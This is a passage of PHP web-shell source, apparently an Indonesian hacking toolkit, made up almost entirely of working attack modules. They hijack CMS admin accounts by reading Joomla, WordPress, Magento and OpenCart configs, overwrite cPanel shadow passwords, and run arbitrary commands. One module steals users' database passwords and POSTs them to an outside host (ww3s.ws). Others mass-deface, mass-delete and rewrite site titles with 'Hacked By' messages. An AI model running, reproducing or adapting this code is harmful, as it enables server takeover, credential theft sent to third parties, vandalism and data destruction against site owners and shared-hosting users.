  1850.             $conf = $_POST['config_dir'];
  1851.             $scan_conf = scandir($conf);
  1852.             foreach($scan_conf as $file_conf) {
  1853.                 if(!is_file("$conf/$file_conf")) continue;
  1854.                 $config = file_get_contents("$conf/$file_conf");
  1855.                 if(preg_match("/JConfig|joomla/",$config)) {
  1856.                     $dbhost = ambilkata($config,"host = '","'");
  1857.                     $dbuser = ambilkata($config,"user = '","'");
  1858.                     $dbpass = ambilkata($config,"password = '","'");
  1859.                     $dbname = ambilkata($config,"db = '","'");
  1860.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1861.                     $prefix = $dbprefix."users";
  1862.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1863.                     $db = mysql_select_db($dbname);
  1864.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1865.                     $result = mysql_fetch_array($q);
  1866.                     $id = $result['id'];
  1867.                     $site = ambilkata($config,"sitename = '","'");
  1868.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1869.                     echo "Config => ".$file_conf."<br>";
  1870.                     echo "CMS => Joomla<br>";
  1871.                     if($site == '') {
  1872.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1873.                     } else {
  1874.                         echo "Sitename => $site<br>";
  1875.                     }
  1876.                     if(!$update OR !$conn OR !$db) {
  1877.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1878.                     } else {
  1879.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1880.                     }
  1881.                     mysql_close($conn);
  1882.                 } elseif(preg_match("/WordPress/",$config)) {
  1883.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1884.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1885.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1886.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1887.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1888.                     $prefix = $dbprefix."users";
  1889.                     $option = $dbprefix."options";
  1890.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1891.                     $db = mysql_select_db($dbname);
  1892.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1893.                     $result = mysql_fetch_array($q);
  1894.                     $id = $result[ID];
  1895.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1896.                     $result2 = mysql_fetch_array($q2);
  1897.                     $target = $result2[option_value];
  1898.                     if($target == '') {
  1899.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1900.                     } else {
  1901.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1902.                     }
  1903.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1904.                     echo "Config => ".$file_conf."<br>";
  1905.                     echo "CMS => Wordpress<br>";
  1906.                     echo $url_target;
  1907.                     if(!$update OR !$conn OR !$db) {
  1908.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1909.                     } else {
  1910.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1911.                     }
  1912.                     mysql_close($conn);
  1913.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1914.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1915.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1916.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1917.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1918.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1919.                     $prefix = $dbprefix."admin_user";
  1920.                     $option = $dbprefix."core_config_data";
  1921.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1922.                     $db = mysql_select_db($dbname);
  1923.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1924.                     $result = mysql_fetch_array($q);
  1925.                     $id = $result[user_id];
  1926.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1927.                     $result2 = mysql_fetch_array($q2);
  1928.                     $target = $result2[value];
  1929.                     if($target == '') {
  1930.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1931.                     } else {
  1932.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1933.                     }
  1934.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1935.                     echo "Config => ".$file_conf."<br>";
  1936.                     echo "CMS => Magento<br>";
  1937.                     echo $url_target;
  1938.                     if(!$update OR !$conn OR !$db) {
  1939.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1940.                     } else {
  1941.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1942.                     }
  1943.                     mysql_close($conn);
  1944.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1945.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1946.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1947.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1948.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1949.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1950.                     $prefix = $dbprefix."user";
  1951.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1952.                     $db = mysql_select_db($dbname);
  1953.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1954.                     $result = mysql_fetch_array($q);
  1955.                     $id = $result[user_id];
  1956.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1957.                     if($target == '') {
  1958.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1959.                     } else {
  1960.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1961.                     }
  1962.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1963.                     echo "Config => ".$file_conf."<br>";
  1964.                     echo "CMS => OpenCart<br>";
  1965.                     echo $url_target;
  1966.                     if(!$update OR !$conn OR !$db) {
  1967.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1968.                     } else {
  1969.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1970.                     }
  1971.                     mysql_close($conn);
  1972.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1973.                     $dbhost = ambilkata($config,'server = "','"');
  1974.                     $dbuser = ambilkata($config,'username = "','"');
  1975.                     $dbpass = ambilkata($config,'password = "','"');
  1976.                     $dbname = ambilkata($config,'database = "','"');
  1977.                     $prefix = "users";
  1978.                     $option = "identitas";
  1979.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1980.                     $db = mysql_select_db($dbname);
  1981.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1982.                     $result = mysql_fetch_array($q);
  1983.                     $target = $result[alamat_website];
  1984.                     if($target == '') {
  1985.                         $target2 = $result[url];
  1986.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1987.                         if($target2 == '') {
  1988.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1989.                         } else {
  1990.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1991.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1992.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1993.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1994.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1995.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1996.                             } else {
  1997.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1998.                             }
  1999.                         }
  2000.                     } else {
  2001.                         $cek_login = file_get_contents("$target/adminweb/");
  2002.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2003.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2004.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2005.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2006.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2007.                         } else {
  2008.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2009.                         }
  2010.                     }
  2011.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2012.                     echo "Config => ".$file_conf."<br>";
  2013.                     echo "CMS => Lokomedia<br>";
  2014.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2015.                         echo $url_target2;
  2016.                     } else {
  2017.                         echo $url_target;
  2018.                     }
  2019.                     if(!$update OR !$conn OR !$db) {
  2020.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2021.                     } else {
  2022.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2023.                     }
  2024.                     mysql_close($conn);
  2025.                 }
  2026.             }
  2027.         }
  2028.     } else {
  2029.         echo "<center>
  2030.         <h2>User Changer Config</h2>
  2031.         <form method='post'>
  2032.         DIR Config: <br>
  2033.         <input type='text' size='50' name='config_dir' value='$path'><br><br>
  2034.         Set User & Pass: <br>
  2035.         <input type='text' name='user_baru' value='x48xShell' placeholder='user_baru'><br>
  2036.         <input type='text' name='pass_baru' value='x48xShell' placeholder='pass_baru'><br>
  2037.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2038.         </form>
  2039.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2040.         ";
  2041.     }
  2042.     break;
  2043. }
  2044.  
  2045. elseif($_GET['c'] == 'smtp') {
  2046.  
  2047. //Bksmile **(RooTTN)**
  2048. // port to scan
  2049. $ports=array(25, 587, 465, 110, 995, 143 , 993);
  2050. $primary_port='25';
  2051. //curent user
  2052. $user=get_current_user();
  2053. // Smtp password
  2054. $password='pistontn';
  2055. //crypt
  2056. $pwd = crypt($password,'$6$pistontn$');
  2057. // host name
  2058.  $t = $_SERVER['SERVER_NAME'];
  2059. //edit
  2060.  $t = @str_replace("www.","",$t);
  2061.  //get users
  2062. @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow');
  2063. //edit
  2064. $ex=explode("\r\n",$passwd);
  2065. //backup shadow
  2066. @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.pistontn.bak');
  2067. //delete shadow
  2068. @unlink('/home/'.$user.'/etc/'.$t.'/shadow');
  2069. // :D
  2070. foreach($ex as $ex){
  2071. $ex=explode(':',$ex);
  2072. $e= $ex[0];
  2073. if ($e){
  2074. $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
  2075. echo '<span style=\'color:#00ff00;\'>'.$t.'|25|'.$e.'@'.$t.'|'.$password.'</span><br>';  "</center>";
  2076. }}
  2077. //port scan
  2078. foreach ($ports as $port)
  2079. {
  2080.     $connection = @fsockopen($t, $port, $errno, $errstr, 2);
  2081.     if (is_resource($connection))
  2082.     {
  2083.         echo '<h2>' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</h2>' . "\n";
  2084.         fclose($connection);
  2085.     }
  2086. }
  2087. }
  2088. elseif($_GET['c'] == 'cmd') {
  2089. echo "<center><form method='post'>
  2090.     <font style='text-decoration: underline;'>con7ext@".gethostbyname($_SERVER['HTTP_HOST']).": ~ $ </font>
  2091.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  2092.     </form>";
  2093.     if($_POST['do_cmd']) {
  2094.         echo "<pre><textarea>".exe($_POST['cmd'])."</textarea></pre>";
  2095.     }
  2096. }
  2097. elseif($_GET['c'] == 'cpanel') {
  2098. @ini_set('display_errors',0);
  2099. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  2100.     $ar0=explode($marqueurDebutLien, $text);
  2101.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  2102.     return trim($ar1[0]);
  2103. }
  2104. echo '<br><br><style>
  2105. textarea {
  2106. resize:none;
  2107. color:black;
  2108. background-color:#ffffff;  
  2109. font-size:8pt; color:black;
  2110. border:1px solid white ;
  2111. border-left: 4px solid white ;
  2112. }
  2113. input {
  2114. color: black;
  2115. border:1px dotted white;
  2116. }
  2117. </style>';
  2118. echo '<center>';
  2119. $d0mains = @file('/etc/named.conf');
  2120. $domains = scandir("/var/named");
  2121. if ($domains or $d0mains)
  2122. {
  2123.     $domains = scandir("/var/named");
  2124.     if($domains) {
  2125. echo "<table align=center><tr><th valign=top  class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";
  2126. $count=1;
  2127. $dc = 0;
  2128. $list = scandir("/var/named");
  2129. foreach($list as $domain){
  2130. if(strpos($domain,".db")){
  2131. $domain = str_replace('.db','',$domain);
  2132. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2133. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  2134. $path = getcwd();
  2135. if (is_readable($dirz)) {
  2136. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  2137. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  2138. $password=entre2v2($p,'password="','"');
  2139. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white  class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
  2140. $dc++;
  2141. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
  2142. $ch = curl_init();
  2143. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  2144. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  2145. curl_setopt($ch, CURLOPT_POST, 1);
  2146. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
  2147. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2148. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2149. curl_setopt($ch, CURLOPT_HEADER, 1);
  2150. $buffer = curl_exec($ch);
  2151. }
  2152. }
  2153. }
  2154. echo '</table>';
  2155. $total = $dc;
  2156.  
  2157. echo '</center>';
  2158. }else{
  2159. $d0mains = @file('/etc/named.conf');
  2160.     if($d0mains) {
  2161. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  2162. $count=1;
  2163. $dc = 0;
  2164. $mck = array();
  2165. foreach($d0mains as $d0main){
  2166.     if(@eregi('zone',$d0main)){
  2167.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  2168.         flush();
  2169.         if(strlen(trim($domain[1][0])) >2){
  2170.             $mck[] = $domain[1][0];
  2171.         }
  2172.     }
  2173. }
  2174. $mck = array_unique($mck);
  2175. $usr = array();
  2176. $dmn = array();
  2177. foreach($mck as $o) {
  2178.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  2179.     $usr[] = $infos['name'];
  2180.     $dmn[] = $o;
  2181. }
  2182. array_multisort($usr,$dmn);
  2183. $dt = file('/etc/passwd');
  2184. $passwd = array();
  2185. foreach($dt as $d) {
  2186.     $r = explode(':',$d);
  2187.     if(strpos($r[5],'home')) {
  2188.         $passwd[$r[0]] = $r[5];
  2189.     }
  2190. }
  2191. $l=0;
  2192. $j=1;
  2193. foreach($usr as $r) {
  2194. $dirz = '/home/'.$r.'/.my.cnf';
  2195. $path = getcwd();
  2196. if (is_readable($dirz)) {
  2197. copy($dirz, ''.$path.'/'.$r.'.txt');
  2198. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  2199. $password=entre2v2($p,'password="','"');
  2200. echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  2201. $dc++;
  2202.                 flush();
  2203.                 $l=$l?0:1;
  2204.                 $j++;
  2205.                 }
  2206.             }
  2207.             }
  2208. echo '</table>';
  2209. $total = $dc;
  2210. echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
  2211. echo '</center>';
  2212. }
  2213.  
  2214. }else{
  2215. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
  2216. }
  2217. } elseif($_GET['c'] == 'c') {
  2218.     echo "<center><form action=\"\" method=\"post\">\n";
  2219.     $dirr=$_POST['d_dir'];
  2220.     $index = $_POST["script"];
  2221.     $index = str_replace('"',"'",$index);
  2222.     $index = stripslashes($index);
  2223.     function edit_file($file,$index){
  2224.         if (is_writable($file)) {
  2225.         clear_fill($file,$index);
  2226.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  2227.         }
  2228.         else {
  2229.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  2230.             }
  2231.             }
  2232.     function hapus_massal($dir,$namafile) {
  2233.         if(is_writable($dir)) {
  2234.             $dira = scandir($dir);
  2235.             foreach($dira as $dirb) {
  2236.                 $dirc = "$dir/$dirb";
  2237.                 $lokasi = $dirc.'/'.$namafile;
  2238.                 if($dirb === '.') {
  2239.                     if(file_exists("$dir/$namafile")) {
  2240.                         unlink("$dir/$namafile");
  2241.                     }
  2242.                 } elseif($dirb === '..') {
  2243.                     if(file_exists("".dirname($dir)."/$namafile")) {
  2244.                         unlink("".dirname($dir)."/$namafile");
  2245.                     }
  2246.                 } else {
  2247.                     if(is_dir($dirc)) {
  2248.                         if(is_writable($dirc)) {
  2249.                             if(file_exists($lokasi)) {
  2250.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  2251.                                 unlink($lokasi);
  2252.                                 $idx = hapus_massal($dirc,$namafile);
  2253.                             }
  2254.                         }
  2255.                     }
  2256.                 }
  2257.             }
  2258.         }
  2259.     }
  2260.     function clear_fill($file,$index){
  2261.         if(file_exists($file)){
  2262.             $handle = fopen($file,'w');
  2263.             fwrite($handle,'');
  2264.             fwrite($handle,$index);
  2265.             fclose($handle);  } }
  2266.  
  2267.     function gass(){
  2268.         global $dirr , $index ;
  2269.         chdir($dirr);
  2270.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  2271.         $files = scandir($dirr) ;
  2272.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  2273.         sort($files);
  2274.         $n = 0 ;
  2275.         foreach ($files as $file){
  2276.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  2277.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  2278.                 edit_file($file,$index);
  2279.                 flush();
  2280.                 $n = $n +1 ;
  2281.                 }
  2282.                 }
  2283.                 echo "<br>";
  2284.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  2285.                     }
  2286.     function ListFiles($dirrall) {
  2287.  
  2288.     if($dh = opendir($dirrall)) {
  2289.  
  2290.        $files = Array();
  2291.        $inner_files = Array();
  2292.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  2293.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  2294.         while($file = readdir($dh)) {
  2295.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  2296.                 if(is_dir($dirrall . "/" . $file)) {
  2297.                     $inner_files = ListFiles($dirrall . "/" . $file);
  2298.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  2299.                 } else {
  2300.                     array_push($files, $dirrall . "/" . $file);
  2301.                 }
  2302.             }
  2303.             }
  2304.  
  2305.             closedir($dh);
  2306.             return $files;
  2307.         }
  2308.     }
  2309.     function gass_all(){
  2310.         global $index ;
  2311.         $dirrall=$_POST['d_dir'];
  2312.         foreach (ListFiles($dirrall) as $key=>$file){
  2313.             $file = str_replace('//',"/",$file);
  2314.             echo "<center><strong>$file</strong> ===>";
  2315.             edit_file($file,$index);
  2316.             flush();
  2317.         }
  2318.         $key = $key+1;
  2319.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  2320.     function sabun_massal($dir,$namafile,$isi_script) {
  2321.         if(is_writable($dir)) {
  2322.             $dira = scandir($dir);
  2323.             foreach($dira as $dirb) {
  2324.                 $dirc = "$dir/$dirb";
  2325.                 $lokasi = $dirc.'/'.$namafile;
  2326.                 if($dirb === '.') {
  2327.                     file_put_contents($lokasi, $isi_script);
  2328.                 } elseif($dirb === '..') {
  2329.                     file_put_contents($lokasi, $isi_script);
  2330.                 } else {
  2331.                     if(is_dir($dirc)) {
  2332.                         if(is_writable($dirc)) {
  2333.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  2334.                             file_put_contents($lokasi, $isi_script);
  2335.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  2336.                         }
  2337.                     }
  2338.                 }
  2339.             }
  2340.         }
  2341.     }
  2342.     if($_POST['c'] == 'onedir') {
  2343.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  2344.         $ini="http://";
  2345.         $mainpath=$_POST[d_dir];
  2346.         $file=$_POST[d_file];
  2347.         $path=opendir("$mainpath");
  2348.         $code=base64_encode($_POST[script]);
  2349.         $indx=base64_decode($code);
  2350.         while($row=readdir($dir)){
  2351.         $start=@fopen("$row/$file","w+");
  2352.         $finish=@fwrite($start,$indx);
  2353.         if ($finish){
  2354.             echo"$ini$row/$file\n";
  2355.             }
  2356.         }
  2357.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  2358.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  2359.         $path=opendir("$mainpath");
  2360.         $code=base64_encode($_POST[script]);
  2361.         $indx=base64_decode($code);
  2362.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  2363.         $finish=@fwrite($start,$indx);
  2364.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  2365.         }
  2366.  
  2367.     }
  2368.     elseif($_POST['c'] == 'sabunkabeh') { gass(); }
  2369.     elseif($_POST['c'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  2370.     elseif($_POST['c'] == 'sabunmematikan') { gass_all(); }
  2371.     elseif($_POST['c'] == 'massdeface') {
  2372.         echo "<div style='margin: 5px auto; padding: 5px'>";
  2373.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  2374.         echo "</div>";  }
  2375.     else {
  2376.         echo "
  2377.         <center><font style='text-decoration: underline;'>
  2378.         Select Type:<br>
  2379.         </font>
  2380.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  2381.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  2382.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  2383.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  2384.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  2385.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  2386.         <font style='text-decoration: underline;'>Folder:</font><br>
  2387.         <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  2388.         <font style='text-decoration: underline;'>Filename:</font><br>
  2389.         <input type='text' name='d_file' value='ngeue.php' style='width: 450px;' height='10'><br>
  2390.         <font style='text-decoration: underline;'>Index File:</font><br>
  2391.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Rinto AR</textarea><br>
  2392.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  2393.         </form></center>";
  2394.         }
  2395. }elseif($_GET['c'] == 'title'){
  2396. echo "<center><h1>Mass Title Changer</h1>
  2397. <form method='post'>
  2398. Link Config: <br>
  2399. <input type='text' name='linkconf' height='10' style='width: 450px;' placeholder='http://jembod.com/rabbitz_symconf/'><br>
  2400. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  2401. </form></center>";
  2402. if($_POST['gass']) {
  2403.     echo "<center>
  2404. <form method='post'>
  2405. Link Config: <br>
  2406. <textarea name='link'>";
  2407. GrabUrl($_POST['linkconf'],'wordpress');  
  2408. echo"</textarea><br>ID: <input type='text' name='id' value='1'><br>TITLE :<input type='text' name='title' value='Hacked By con7ext'><br>POST CONTENT: <input type='text' name='content' value='Hacked By con7ext'><br>POSTNAME: <input type='text' name='postname' value='HackeD By Con7ext'><br>
  2409. <input type='submit' style='width: 450px;' name='edittitle' value='Hajar!!'>
  2410. </form></center>";
  2411. }
  2412. if($_POST['edittitle']) {
  2413.             $title = htmlspecialchars($_POST['title']);
  2414.                 $id = $_POST['id'];
  2415.                 $content = $_POST['content'];
  2416.                 $postname = $_POST['name'];
  2417.         function anucurl($sites) {
  2418.             $ch = curl_init($sites);
  2419.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2420.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2421.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2422.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2423.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2424.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2425.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2426.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2427.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2428.             $data = curl_exec($ch);
  2429.                   curl_close($ch);
  2430.             return $data;
  2431.         }
  2432.         $link = explode("\r\n", $_POST['link']);
  2433.         foreach($link as $dir_config) {
  2434.                                 $config = anucurl($dir_config);
  2435.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2436.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2437.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2438.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2439.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2440.                 $prefix = $dbprefix."posts";
  2441.                 $option = $dbprefix."options";
  2442.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2443.                 $db = mysql_select_db($dbname);
  2444.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2445.                 $result = mysql_fetch_array($q);
  2446.                 $id = $result[ID];
  2447.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2448.                 $result2 = mysql_fetch_array($q2);
  2449.                 $target = $result2[option_value];
  2450.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$content',post_name='$postname',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2451.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2452.                 echo "<div style='margin: 5px auto;'>";
  2453.                 if($target == '') {
  2454.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2455.                 } else {
  2456.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2457.                 }
  2458.                 if(!$update OR !$conn OR !$db) {
  2459.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2460.                 } else {
  2461.                     echo "<font color=lime>sukses di ganti.</font><br>";
  2462.                 }
